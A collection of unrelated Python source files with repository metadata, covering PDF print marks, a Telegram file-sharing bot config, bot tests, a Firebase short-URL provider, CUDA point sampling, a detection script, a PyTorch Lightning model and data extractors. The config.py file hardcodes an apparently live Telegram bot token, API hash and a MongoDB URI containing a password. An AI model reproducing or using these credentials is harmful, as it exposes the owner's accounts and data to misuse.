self.__draw_crop_lines(printing_template)\n if self.reg:\n self.__draw_registration(printing_template)\n if self.cmyk:\n self.__draw_color_marker(printing_template)\n printing_template.showPage()\n printing_template.save()\n\n tem_byte.seek(0)\n template_pdf = pypdf.PdfFileReader(tem_byte)\n\n return template_pdf, tem_byte\n\n def do(\n self, index: int, manuscript: Manuscript, file_mode: str = \"safe\"\n ) -> NoReturn:\n\n if not self.on:\n pass\n else:\n new_pdf, new_file = self.get_new_pdf(index, manuscript, file_mode)\n template_pdf, tem_byte = self.generate_template(manuscript)\n template = template_pdf.pages[0]\n for i, page in enumerate(manuscript.pages):\n temp_page = copy(template)\n page.addTransformation(\n pypdf.Transformation().translate(tx=self.margin, ty=self.margin)\n )\n upper = float(page.mediaBox[2])\n right = float(page.mediaBox[3])\n page.mediaBox.setUpperRight((upper + self.margin, right + self.margin))\n\n temp_page.merge_page(page)\n new_pdf.add_page(temp_page)\n\n new_pdf.write(new_file)\n\n manuscript.pdf_update(new_pdf, new_file)\n", "repo_name": "HornPenguin/Booklet", "sub_path": "booklet/core/templates/printingmark.py", "file_name": "printingmark.py", "file_ext": "py", "file_size_in_byte": 14082, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "53", "api": [{"api_name": "booklet.core.manuscript.Template", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 62, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 63, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 64, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 78, "usage_type": "name"}, {"api_name": "reportlab.pdfgen.canvas.Canvas", "line_number": 84, "usage_type": "name"}, {"api_name": "booklet.utils.conversion.mm", "line_number": 88, "usage_type": "name"}, {"api_name": "reportlab.pdfgen.canvas.Canvas", "line_number": 94, "usage_type": "name"}, {"api_name": "reportlab.pdfgen.canvas.Canvas", "line_number": 110, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 194, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 196, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 197, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 198, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 199, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 215, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 217, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 218, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 219, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 220, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 221, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 222, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 223, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 224, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 240, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 294, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 241, "usage_type": "name"}, {"api_name": "typing.Literal", "line_number": 241, "usage_type": "name"}, {"api_name": "reportlab.pdfgen.canvas.Canvas", "line_number": 303, "usage_type": "name"}, {"api_name": "booklet.utils.color.Basis_Colors", "line_number": 323, "usage_type": "name"}, {"api_name": "booklet.utils.color.Basis_Colors", "line_number": 324, "usage_type": "name"}, {"api_name": "booklet.core.manuscript.Manuscript", "line_number": 366, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 371, "usage_type": "call"}, {"api_name": "reportlab.pdfgen.canvas.Canvas", "line_number": 372, "usage_type": "call"}, {"api_name": "PyPDF2.PdfFileReader", "line_number": 384, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 367, "usage_type": "name"}, {"api_name": "PyPDF2.PdfFileReader", "line_number": 367, "usage_type": "attribute"}, {"api_name": "io.BytesIO", "line_number": 367, "usage_type": "name"}, {"api_name": "booklet.core.manuscript.Manuscript", "line_number": 389, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 399, "usage_type": "call"}, {"api_name": "PyPDF2.Transformation", "line_number": 401, "usage_type": "call"}]} +{"seq_id": "9553939884", "text": "#(©)CodeXBotz\n\n\n\n\nimport os\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\n\n\n#Bot token @Botfather\nTG_BOT_TOKEN = \"5786017840:AAEsbeA-1QUdr_0Stp3Bg8V0ov0kxl1A_28\"\n\n#Your API ID from my.telegram.org\nAPP_ID = 3845818\n\n#Your API Hash from my.telegram.org\nAPI_HASH = \"95937bcf6bc0938f263fc7ad96959c6d\"\n\n#Your db channel Id\nCHANNEL_ID = -1001441020553\n\n#OWNER ID\nOWNER_ID = 1443454117\n\n#Port\nPORT = \"8082\"\n\n#Database \nDB_URI = \"mongodb+srv://anime:2004@cluster0.ghzkqob.mongodb.net/?retryWrites=true&w=majority\" \nDB_NAME = \"filesharexbot\"\n\n#force sub channel id, if you want enable force sub\nFORCE_SUB_CHANNEL = -1001298683832\n\nTG_BOT_WORKERS = 4\n\n#start message\nSTART_MSG = \"Hey! {first}\\n\\nI am currently serving for @animxt.\"\nADMINS=[1863307059, 1425489930]\n\n#Force sub message \nFORCE_MSG = 'Hey! {mention},\\n\\nKindly join the channel & try again to get the files.'\n\n#set your Custom Caption here, Keep None for Disable Custom Caption\nCUSTOM_CAPTION = \"@animxt\"\n\n#set True if you want to prevent users from forwarding files from bot\nPROTECT_CONTENT = \"True\"\n\n#Set true if you want Disable your Channel Posts Share button\nDISABLE_CHANNEL_BUTTON = \"True\"\n\nBOT_STATS_TEXT = \"BOT UPTIME\\n{uptime}\"\nUSER_REPLY_TEXT = \"❌Don't send me messages directly I'm only File Share bot!\"\n\nLOG_FILE_NAME = \"filesharingbot.txt\"\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"[%(asctime)s - %(levelname)s] - %(name)s - %(message)s\",\n datefmt='%d-%b-%y %H:%M:%S',\n handlers=[\n RotatingFileHandler(\n LOG_FILE_NAME,\n maxBytes=50000000,\n backupCount=10\n ),\n logging.StreamHandler()\n ]\n)\nlogging.getLogger(\"pyrogram\").setLevel(logging.WARNING)\n\n\ndef LOGGER(name: str) -> logging.Logger:\n return logging.getLogger(name)\n", "repo_name": "Rindo55/diamond", "sub_path": "config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1846, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 61, "usage_type": "attribute"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 65, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 70, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 73, "usage_type": "call"}, {"api_name": "logging.WARNING", "line_number": 73, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 77, "usage_type": "call"}, {"api_name": "logging.Logger", "line_number": 76, "usage_type": "attribute"}]} +{"seq_id": "18106361685", "text": "import pytest\n\nfrom aiogram import types\n\nfrom manga_notify.bot import callback_data\n\n\ndef test_serializetion():\n data = callback_data.CallbackData(\n method='my_method',\n payload={\n 'hello': 'world',\n },\n )\n serialized = data.serialize()\n assert serialized\n assert data == callback_data.parse(serialized)\n\n\n@pytest.mark.parametrize(\n 'matcher_method, is_matched',\n (\n pytest.param(\n 'my_method',\n True,\n id='match',\n ),\n pytest.param(\n 'another_method',\n False,\n id='do_not_match',\n ),\n )\n)\ndef test_matcher(matcher_method, is_matched):\n data = callback_data.CallbackData(\n method='my_method',\n payload={},\n )\n serialized = data.serialize()\n query = types.CallbackQuery(\n id='1',\n from_user=types.User(id=1, is_bot=False, first_name='user'),\n chat_instance='chat_instance',\n data=serialized,\n )\n matcher = callback_data.create_matcher(matcher_method)\n assert matcher(query) == is_matched\n", "repo_name": "IsThisLoss/manga-notify", "sub_path": "tests/bot/test_callback_data.py", "file_name": "test_callback_data.py", "file_ext": "py", "file_size_in_byte": 1101, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "manga_notify.bot.callback_data.CallbackData", "line_number": 9, "usage_type": "call"}, {"api_name": "manga_notify.bot.callback_data", "line_number": 9, "usage_type": "name"}, {"api_name": "manga_notify.bot.callback_data.parse", "line_number": 17, "usage_type": "call"}, {"api_name": "manga_notify.bot.callback_data", "line_number": 17, "usage_type": "name"}, {"api_name": "manga_notify.bot.callback_data.CallbackData", "line_number": 36, "usage_type": "call"}, {"api_name": "manga_notify.bot.callback_data", "line_number": 36, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 41, "usage_type": "call"}, {"api_name": "aiogram.types", "line_number": 41, "usage_type": "name"}, {"api_name": "aiogram.types.User", "line_number": 43, "usage_type": "call"}, {"api_name": "aiogram.types", "line_number": 43, "usage_type": "name"}, {"api_name": "manga_notify.bot.callback_data.create_matcher", "line_number": 47, "usage_type": "call"}, {"api_name": "manga_notify.bot.callback_data", "line_number": 47, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 20, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pytest.param", "line_number": 23, "usage_type": "call"}, {"api_name": "pytest.param", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "32379681965", "text": "import os\nfrom typing import Any\n\nimport requests\n\nfrom domains.models import Domain\nfrom .base import BaseShortUrlProvider\nfrom ..exceptions import ShortUrlProviderError\n\n\nclass FirebaseDynamicLinksShortUrlProvider(BaseShortUrlProvider):\n host = 'https://firebasedynamiclinks.googleapis.com'\n api_key = os.environ.get(\"FIREBASE_WEB_API_KEY\")\n\n def list_short_urls(self, domain: Domain) -> list[dict[str, Any]]:\n raise ShortUrlProviderError()\n\n def create_short_url(self, domain: Domain, **kwargs) -> dict[str, Any]:\n request_body = {\n 'dynamicLinkInfo': {\n 'domainUriPrefix': f'https://{domain.name}',\n 'link': kwargs.get('long_url'),\n },\n 'suffix': {\n 'option': 'SHORT'\n }\n }\n response = requests.post(self.host + '/v1/shortLinks',\n params={'key': self.api_key}, json=request_body)\n try:\n response.raise_for_status()\n except requests.HTTPError:\n raise ShortUrlProviderError(response.json())\n from shorturls.models import ShortUrl\n return {\n 'short': ShortUrl.split_short_url(response.json()['shortLink'])[-1],\n }\n\n def retrieve_short_url(self, domain: Domain, short: str) -> dict[str, Any] | None:\n raise ShortUrlProviderError()\n\n def update_short_url(self, domain: Domain, short: str, **kwargs) -> dict[str, Any]:\n raise ShortUrlProviderError()\n\n def delete_short_url(self, domain: Domain, short: str) -> None:\n raise ShortUrlProviderError()\n\n def get_hostname(self, domain: Domain) -> str:\n return 'web.app'\n", "repo_name": "sjy5386/flare-core", "sub_path": "shorturls/providers/firebase.py", "file_name": "firebase.py", "file_ext": "py", "file_size_in_byte": 1681, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base.BaseShortUrlProvider", "line_number": 11, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 13, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "domains.models.Domain", "line_number": 15, "usage_type": "name"}, {"api_name": "exceptions.ShortUrlProviderError", "line_number": 16, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 15, "usage_type": "name"}, {"api_name": "domains.models.Domain", "line_number": 18, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 28, "usage_type": "call"}, {"api_name": "requests.HTTPError", "line_number": 32, "usage_type": "attribute"}, {"api_name": "exceptions.ShortUrlProviderError", "line_number": 33, "usage_type": "call"}, {"api_name": "shorturls.models.ShortUrl.split_short_url", "line_number": 36, "usage_type": "call"}, {"api_name": "shorturls.models.ShortUrl", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 18, "usage_type": "name"}, {"api_name": "domains.models.Domain", "line_number": 39, "usage_type": "name"}, {"api_name": "exceptions.ShortUrlProviderError", "line_number": 40, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 39, "usage_type": "name"}, {"api_name": "domains.models.Domain", "line_number": 42, "usage_type": "name"}, {"api_name": "exceptions.ShortUrlProviderError", "line_number": 43, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 42, "usage_type": "name"}, {"api_name": "domains.models.Domain", "line_number": 45, "usage_type": "name"}, {"api_name": "exceptions.ShortUrlProviderError", "line_number": 46, "usage_type": "call"}, {"api_name": "domains.models.Domain", "line_number": 48, "usage_type": "name"}]} +{"seq_id": "4082517443", "text": "from torch.autograd import Function\nimport fps_with_features_cuda\nimport torch\n\nclass FPS_F(Function):\n @staticmethod\n def forward(ctx,xyz:torch.tensor,predix:torch.tensor,npoints:int):\n # xyz is not only has coordinate, xyz = [x,y,z,c1,c2...,cn] shape(B,N,C)\n assert xyz.is_contiguous()\n B,N,C = xyz.size()\n m1 = predix.shape[0]\n output = torch.cuda.IntTensor(B,npoints)\n temp = torch.cuda.FloatTensor(B,N).fill_(1e10)\n fps_with_features_cuda.fps_with_features_wrapper(B, N, npoints,m1, C,xyz,predix, temp, output)\n return output\n @staticmethod\n def backward(xyz, a=None):\n return None,None\nfps_with_featres = FPS_F.apply\n\nclass FPS_D(Function):\n @staticmethod\n def forward(ctx,xyz:torch.tensor,npoint:int):\n # predix is the index of forground point (B,m2,1)\n #xyz (B,N,3)\n assert xyz.is_contiguous()\n B, N, C = xyz.size()\n output = torch.cuda.IntTensor(B, npoint)\n temp = torch.cuda.FloatTensor(B, N).fill_(1e18)\n fps_with_features_cuda.furthest_point_sampling_wrapper(B, N, npoint,xyz, temp, output)\n return output\n def backward(ctx, a = None):\n return None,None\nfps_with_distance = FPS_D.apply", "repo_name": "liangzhao123/IOU-SSD", "sub_path": "vis_points/fps_utils/fps_func_utils.py", "file_name": "fps_func_utils.py", "file_ext": "py", "file_size_in_byte": 1245, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.autograd.Function", "line_number": 5, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 7, "usage_type": "attribute"}, {"api_name": "torch.cuda.IntTensor", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.cuda.FloatTensor", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 13, "usage_type": "attribute"}, {"api_name": "fps_with_features_cuda.fps_with_features_wrapper", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.autograd.Function", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.cuda.IntTensor", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.cuda.FloatTensor", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 29, "usage_type": "attribute"}, {"api_name": "fps_with_features_cuda.furthest_point_sampling_wrapper", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "20985476757", "text": "#-*- coding=utf-8 -*-\n# 统计数据检出情况\nimport cv2\nimport sys\nimport os\nimport glob\nimport random\nsys.path.insert(0, '/home/remo/from_wdh/remodet_repository_llp/python')\n# print sys.path\nimport caffe\nimport numpy as np\nsys.path.append(\"../\")\nimport img_func as func\nimport math\nsys.path.append(\"/home/remo/from_wdh\")\nfrom detFunc import SsdDet\ncaffe.set_mode_gpu()\ncaffe.set_device(0)\n\n# 获取模型文件地址,以及测试的图像/视频的地址\n\ndef save_txt(dirs,txtx):\n for ind in xrange(len(dirs)):\n\n dirr = dirs[ind]\n if os.path.exists(os.path.dirname(dirr))==False:\n os.makedirs(os.path.dirname(dirr))\n txt = txtx[ind]\n f=open(dirr,'w')\n for obj in txt:\n st=str(obj[0])\n for ind in xrange(len(obj)):\n if ind !=0:\n st = st + ' ' + str(obj[ind])\n f.writelines(st+'\\n')\n # f.write(txtx)\n f.close()\n\ndef det_models():\n net_info = {\n\t\t\"cat_dog_fpn_ig_20w\": [0, 0, \"/home/remo/from_wdh/Det_CatDog_llp/DarkNet_fpn/test.prototxt\",\n\t\t\t\t\t\t\t \"/home/remo/from_wdh/Det_CatDog_llp/DarkNet_fpn/Models_ig/DarkNet_fpn_ig_iter_200000.caffemodel\",\n\t\t\t\t\t\t\t 0],\n }\n\n\n img_root = [\"/home/remo/from_wdh/CatDog_Videos/猫\",\"/home/remo/from_wdh/CatDog_Videos/狗\"]\n\n return net_info, img_root\n\n\n\ndef gen_det_txt(net_dic,img_roots,det=SsdDet()):\n for img_root in img_roots:# cat or dog\n print(img_root)\n img_lists0 = os.listdir(img_root)\n img_lists0 = [img_root +'/'+ pa for pa in img_lists0]\n for img_listss in img_lists0: # zishi\n img_lists = glob.glob(img_listss +'/*')\n print(img_listss.split('/')[-1])\n total = 0\n detout=0\n for num, img_name in enumerate(img_lists):\n total+=1\n if img_name.split(\".\")[-1] == 'jpg':\n img = cv2.imread(img_name)\n # 2. -------------------检测---------------------------------\n resss=det.det_txt(img)\n # print(resss)\n\n if resss!=0:\n detout+=1\n print('nodet, %d total %d'%(total-detout,total))\n\n\n\n\nif __name__ == '__main__':\n net_dict_info, img_roots = det_models()\n ssd_det = SsdDet()\n ssd_det.det_init(net_dict_info)\n gen_det_txt(net_dict_info,img_roots,ssd_det)\n\n\n\n\n", "repo_name": "UrwLee/Remo_experience", "sub_path": "dog_cat_test/mystat.py", "file_name": "mystat.py", "file_ext": "py", "file_size_in_byte": 2403, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.insert", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "caffe.set_mode_gpu", "line_number": 17, "usage_type": "call"}, {"api_name": "caffe.set_device", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 26, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "detFunc.SsdDet", "line_number": 53, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 56, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 66, "usage_type": "call"}, {"api_name": "detFunc.SsdDet", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "11736447115", "text": "import torch\nimport torch.nn.functional as F\n\nimport torchmetrics\nimport pytorch_lightning as pl\nfrom pytorch_lightning.loggers import WandbLogger\nfrom pytorch_lightning.callbacks import ModelCheckpoint\n\n\nclass DTI_prediction(pl.LightningModule):\n def __init__(self, model, len_train_dataloader, learning_rate):\n super().__init__()\n self.model = model\n self.len_train_dataloader = len_train_dataloader\n self.learning_rate = learning_rate\n # self.loss = torch.nn.binary\n\n def step(self, batch):\n mol_feature, prot_feat_student, prot_feat_teacher, y, source = batch\n prot_feat_teacher = prot_feat_teacher.detach()\n pred, lambda_ = self.model(mol_feature, prot_feat_student, prot_feat_teacher)\n\n loss = F.binary_cross_entropy_with_logits(pred, y)\n pred = F.sigmoid(pred)\n # loss = F.smooth_l1_loss(pred, y)\n # pred = pred.float()\n\n return pred, y, source, loss, lambda_\n\n def training_step(self, batch, batch_idx):\n _, _, _, loss, lambda_ = self.step(batch)\n\n self.log(\"train_loss\", loss, on_step=False, on_epoch=True, prog_bar=True)\n self.log(\"train_lambda_\", lambda_, on_step=True, on_epoch=True, prog_bar=False)\n\n return loss\n\n def validation_step(self, batch, batch_idx):\n preds, y, _, loss, lambda_ = self.step(batch)\n self.log(\"valid_loss\", loss, on_step=False, on_epoch=True, prog_bar=True)\n self.log(\"valid_lambda_\", lambda_, on_step=False, on_epoch=True, prog_bar=True)\n\n return {\"preds\": preds, \"target\": y}\n\n def validation_epoch_end(self, outputs):\n preds = torch.cat([tmp[\"preds\"] for tmp in outputs], 0).detach().cpu()\n targets = torch.cat([tmp[\"target\"] for tmp in outputs], 0).detach().cpu().long()\n\n auroc = torchmetrics.functional.auroc(preds, targets.long(), task=\"binary\")\n auprc = torchmetrics.functional.average_precision(\n preds, targets.long(), task=\"binary\"\n )\n self.log(\"valid_auroc\", auroc, on_step=False, on_epoch=True, prog_bar=True)\n self.log(\"valid_auprc\", auprc, on_step=False, on_epoch=True, prog_bar=True)\n\n def test_step(self, batch, batch_idx):\n preds, y, _, loss, lambda_ = self.step(batch)\n self.log(\"test_loss\", loss, on_step=False, on_epoch=True, prog_bar=True)\n\n return {\"preds\": preds, \"target\": y}\n\n def test_epoch_end(self, outputs):\n preds = torch.cat([tmp[\"preds\"] for tmp in outputs], 0).detach().cpu()\n targets = torch.cat([tmp[\"target\"] for tmp in outputs], 0).detach().cpu().long()\n\n auroc = torchmetrics.functional.auroc(preds, targets.long(), task=\"binary\")\n auprc = torchmetrics.functional.average_precision(\n preds, targets.long(), task=\"binary\"\n )\n self.log(\"test_auroc\", auroc, on_step=False, on_epoch=True, prog_bar=True)\n self.log(\"test_auprc\", auprc, on_step=False, on_epoch=True, prog_bar=True)\n\n conf_mat = torchmetrics.functional.confusion_matrix(\n preds, targets, task=\"binary\"\n )\n\n print(conf_mat)\n\n def predict_step(self, batch, batch_idx):\n pred, y, source, _, _ = self.step(batch)\n\n return pred, y, source\n\n def configure_optimizers(self):\n optimizer = torch.optim.AdamW(self.parameters(), lr=self.learning_rate)\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(\n optimizer, T_max=100 * self.len_train_dataloader\n )\n\n return {\"optimizer\": optimizer, \"lr_scheduler\": scheduler}\n\n\ndef define_callbacks(PROJECT_NAME):\n callbacks = [\n ModelCheckpoint(\n monitor=\"valid_auprc\",\n mode=\"max\",\n save_top_k=1,\n dirpath=f\"weights/{PROJECT_NAME}\",\n filename=\"DTI-{epoch:03d}-{valid_loss:.4f}-{valid_auroc:.4f}-{valid_auprc:.4f}\",\n ),\n ]\n\n return callbacks\n", "repo_name": "jonghyunlee1993/DLM-DTI_hint-based-learning", "sub_path": "models/model_interface.py", "file_name": "model_interface.py", "file_ext": "py", "file_size_in_byte": 3893, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytorch_lightning.LightningModule", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.binary_cross_entropy_with_logits", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.functional.sigmoid", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 47, "usage_type": "call"}, {"api_name": "torchmetrics.functional.auroc", "line_number": 49, "usage_type": "call"}, {"api_name": "torchmetrics.functional", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torchmetrics.functional.average_precision", "line_number": 50, "usage_type": "call"}, {"api_name": "torchmetrics.functional", "line_number": 50, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 64, "usage_type": "call"}, {"api_name": "torchmetrics.functional.auroc", "line_number": 66, "usage_type": "call"}, {"api_name": "torchmetrics.functional", "line_number": 66, "usage_type": "attribute"}, {"api_name": "torchmetrics.functional.average_precision", "line_number": 67, "usage_type": "call"}, {"api_name": "torchmetrics.functional", "line_number": 67, "usage_type": "attribute"}, {"api_name": "torchmetrics.functional.confusion_matrix", "line_number": 73, "usage_type": "call"}, {"api_name": "torchmetrics.functional", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.optim.AdamW", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 85, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.CosineAnnealingLR", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.callbacks.ModelCheckpoint", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "3733409349", "text": "\"\"\"Base Extractor classes\nA module for the base Extractor classes. The Extractor, given a session path, will extract the\nprocessed data from raw hardware files and optionally save them.\n\"\"\"\n\nimport abc\nfrom collections import OrderedDict\nimport json\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nfrom one.alf.files import get_session_path\nfrom ibllib.io import raw_data_loaders as raw\nfrom ibllib.io.raw_data_loaders import load_settings, _logger\n\n\nclass BaseExtractor(abc.ABC):\n \"\"\"\n Base extractor class\n Writing an extractor checklist:\n - on the child class, overload the _extract method\n - this method should output one or several numpy.arrays or dataframe with a consistent shape\n - save_names is a list or a string of filenames, there should be one per dataset\n - set save_names to None for a dataset that doesn't need saving (could be set dynamically\n in the _extract method)\n :param session_path: Absolute path of session folder\n :type session_path: str/Path\n \"\"\"\n\n session_path = None\n save_names = None\n default_path = Path(\"alf\") # relative to session\n\n def __init__(self, session_path=None):\n # If session_path is None Path(session_path) will fail\n self.session_path = Path(session_path)\n\n def extract(self, save=False, path_out=None, **kwargs):\n \"\"\"\n :return: numpy.ndarray or list of ndarrays, list of filenames\n :rtype: dtype('float64')\n \"\"\"\n out = self._extract(**kwargs)\n files = self._save(out, path_out=path_out) if save else None\n return out, files\n\n def _save(self, data, path_out=None):\n # Chack if self.save_namesis of the same length of out\n if not path_out:\n path_out = self.session_path.joinpath(self.default_path)\n path_out.mkdir(exist_ok=True, parents=True)\n\n def _write_to_disk(file_path, data):\n \"\"\"Implements different save calls depending on file extension\"\"\"\n csv_separators = {\n \".csv\": \",\",\n \".ssv\": \" \",\n \".tsv\": \"\\t\",\n }\n file_path = Path(file_path)\n if file_path.suffix == \".npy\":\n np.save(file_path, data)\n elif file_path.suffix in [\".parquet\", \".pqt\"]:\n if not isinstance(data, pd.DataFrame):\n _logger.error(\"Data is not a panda's DataFrame object\")\n raise TypeError(\"Data is not a panda's DataFrame object\")\n data.to_parquet(file_path)\n elif file_path.suffix in [\".csv\", \".ssv\", \".tsv\"]:\n sep = csv_separators[file_path.suffix]\n data.to_csv(file_path, sep=sep)\n # np.savetxt(file_path, data, delimiter=sep)\n else:\n _logger.error(f\"Don't know how to save {file_path.suffix} files yet\")\n\n if self.save_names is None:\n file_paths = []\n elif isinstance(self.save_names, str):\n file_paths = path_out.joinpath(self.save_names)\n _write_to_disk(file_paths, data)\n else: # Should be list or tuple...\n assert len(data) == len(self.save_names)\n file_paths = []\n for data, fn in zip(data, self.save_names):\n if fn:\n fpath = path_out.joinpath(fn)\n _write_to_disk(fpath, data)\n file_paths.append(fpath)\n return file_paths\n\n @abc.abstractmethod\n def _extract(self):\n pass\n\n\nclass BaseBpodTrialsExtractor(BaseExtractor):\n \"\"\"\n Base (abstract) extractor class for bpod jsonable data set\n Wrps the _extract private method\n\n :param session_path: Absolute path of session folder\n :type session_path: str\n :param bpod_trials\n :param settings\n \"\"\"\n\n bpod_trials = None\n settings = None\n\n def extract(self, bpod_trials=None, settings=None, **kwargs):\n \"\"\"\n :param: bpod_trials (optional) bpod trials from jsonable in a dictionary\n :param: settings (optional) bpod iblrig settings json file in a dictionary\n :param: save (bool) write output ALF files, defaults to False\n :param: path_out (pathlib.Path) output path (defaults to `{session_path}/alf`)\n :return: numpy.ndarray or list of ndarrays, list of filenames\n :rtype: dtype('float64')\n \"\"\"\n self.bpod_trials = bpod_trials\n self.settings = settings\n if self.bpod_trials is None:\n self.bpod_trials = raw.load_data(self.session_path)\n if not self.settings:\n self.settings = raw.load_settings(self.session_path)\n if self.settings is None:\n self.settings = {\"IBLRIG_VERSION_TAG\": \"100.0.0\"}\n elif self.settings[\"IBLRIG_VERSION_TAG\"] == \"\":\n self.settings[\"IBLRIG_VERSION_TAG\"] = \"100.0.0\"\n return super(BaseBpodTrialsExtractor, self).extract(**kwargs)\n\n\ndef run_extractor_classes(classes, session_path=None, **kwargs):\n \"\"\"\n Run a set of extractors with the same inputs\n :param classes: list of Extractor class\n :param save: True/False\n :param path_out: (defaults to alf path)\n :param kwargs: extractor arguments (session_path...)\n :return: dictionary of arrays, list of files\n \"\"\"\n files = []\n outputs = OrderedDict({})\n assert session_path\n # if a single class is passed, convert as a list\n try:\n iter(classes)\n except TypeError:\n classes = [classes]\n for classe in classes:\n cls = classe(session_path=session_path)\n out, fil = cls.extract(**kwargs)\n if isinstance(fil, list):\n files.extend(fil)\n elif fil is not None:\n files.append(fil)\n if isinstance(cls.var_names, str):\n outputs[cls.var_names] = out\n else:\n for i, k in enumerate(cls.var_names):\n outputs[k] = out[i]\n return outputs, files\n\n\ndef _get_task_types_json_config():\n with open(Path(__file__).parent.joinpath('extractor_types.json')) as fp:\n task_types = json.load(fp)\n try:\n # look if there are custom extractor types in the personal projects repo\n import projects.base\n custom_extractors = Path(projects.base.__file__).parent.joinpath('extractor_types.json')\n 